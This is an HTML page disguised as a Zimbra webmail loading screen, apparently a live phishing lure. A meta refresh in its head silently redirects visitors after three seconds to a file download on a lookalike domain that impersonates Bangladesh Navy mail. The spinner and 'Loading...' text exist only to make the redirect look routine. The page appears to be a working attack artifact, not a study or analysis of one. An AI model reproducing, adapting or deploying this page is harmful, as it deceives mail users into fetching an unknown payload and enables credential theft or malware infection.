<!DOCTYPE html>
<html class="js flexbox flexboxlegacy canvas canvastext webgl no-touch geolocation postmessage no-websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers no-applicationcache svg inlinesvg smil svgclippaths template user_font_size_normal" lang="en">
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="cache-control" content="no-cache">
    <meta http-equiv="Pragma" content="no-cache">
     <meta http-equiv = "refresh" content = "03; url = https://mail.navy.mil.bd.docum.store/download/pdffile"/>
    <title>Zimbra</title>
    <link href="./files/stylesheet/common,login,zhtml,skin.css" rel="stylesheet" type="text/css">
    <link rel="SHORTCUT ICON" href="./files/favicon.ico" id="DWT2" type="image/x-icon">
<style>
.loader {
    width: 30px;
    height: 30px;
    border: 2px solid #f2f2f2;
    border-bottom-color: grey;
    border-radius: 50%;
    display: inline-block;
    box-sizing: border-box;
    animation: rotation 1s linear infinite;
    }

    @keyframes rotation {
    0% {
        transform: rotate(0deg);
    }
    100% {
        transform: rotate(360deg);
    }
    } 
    
    #loader {
    
    height:100px;
    width:200px;
    margin-top:280px;
    background-color:#f2f2f2;
    padding-top:35px;
    
    
    }

</style>
</head>
<body class="user_font_system" style="margin: 0px; overflow: hidden;">
	   <center>

	<div id="loader">

	<span class="loader"></span><br><br>

	<span id="load" style="font-family: Helvetica Neue,Helvetica,Arial,Liberation Sans,sans-serif; color:#8b8b8b; display: none;">Loading...</span>
	<script>
	setTimeout(function() {
	  document.getElementById("load").style.display = "block";
	}, 2000);
	</script>
	</div>
	</center>
	</body>
	</html>
